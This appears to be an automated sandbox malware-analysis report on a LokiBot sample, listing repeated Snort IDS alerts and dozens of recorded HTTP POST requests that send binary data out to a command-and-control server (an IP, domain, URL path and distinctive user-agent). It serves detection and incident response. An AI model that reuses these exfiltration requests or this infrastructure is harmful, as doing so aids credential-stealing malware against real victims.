    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49903
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49904 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49904 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49904 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49904 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49904
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49905 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49905 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49905 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49905 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49905
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49906 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49906 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49906 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49906 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49906
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49907 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49907 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49907 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49907 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49907
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49908 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49908 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49908 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49908 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49908
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49909 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49909 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49909 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49909 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49909
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49910 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49910 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49910 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49910 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49910
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49911 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49911 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49911 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49911 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49911
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49913 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49913 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49913 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49913 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49913
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49914 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49914 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49914 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49914 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49914
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49915 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49915 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49915 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49915 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49915
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49916 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49916 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49916 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49916 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49916
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49917 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49917 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49917 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49917 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49917
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49918 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49918 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49918 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49918 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49918
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49919 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49919 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49919 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49919 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49919
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49920 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49920 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49920 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49920 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49920
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49921 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49921 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49921 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49921 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 85.209.2.33:80 -> 192.168.11.20:49921
    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49922 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49922 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49922 -> 85.209.2.33:80
    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49922 -> 85.209.2.33:80
    Creates HTML files with .exe extension (expired dropper behavior)Show sources
    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeFile created: fabrika.exe.4.dr
    Source: Joe Sandbox ViewASN Name: AXATEL-ASRU AXATEL-ASRU
    Source: Joe Sandbox ViewIP Address: 85.209.2.33 85.209.2.33
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 178Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 3206Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
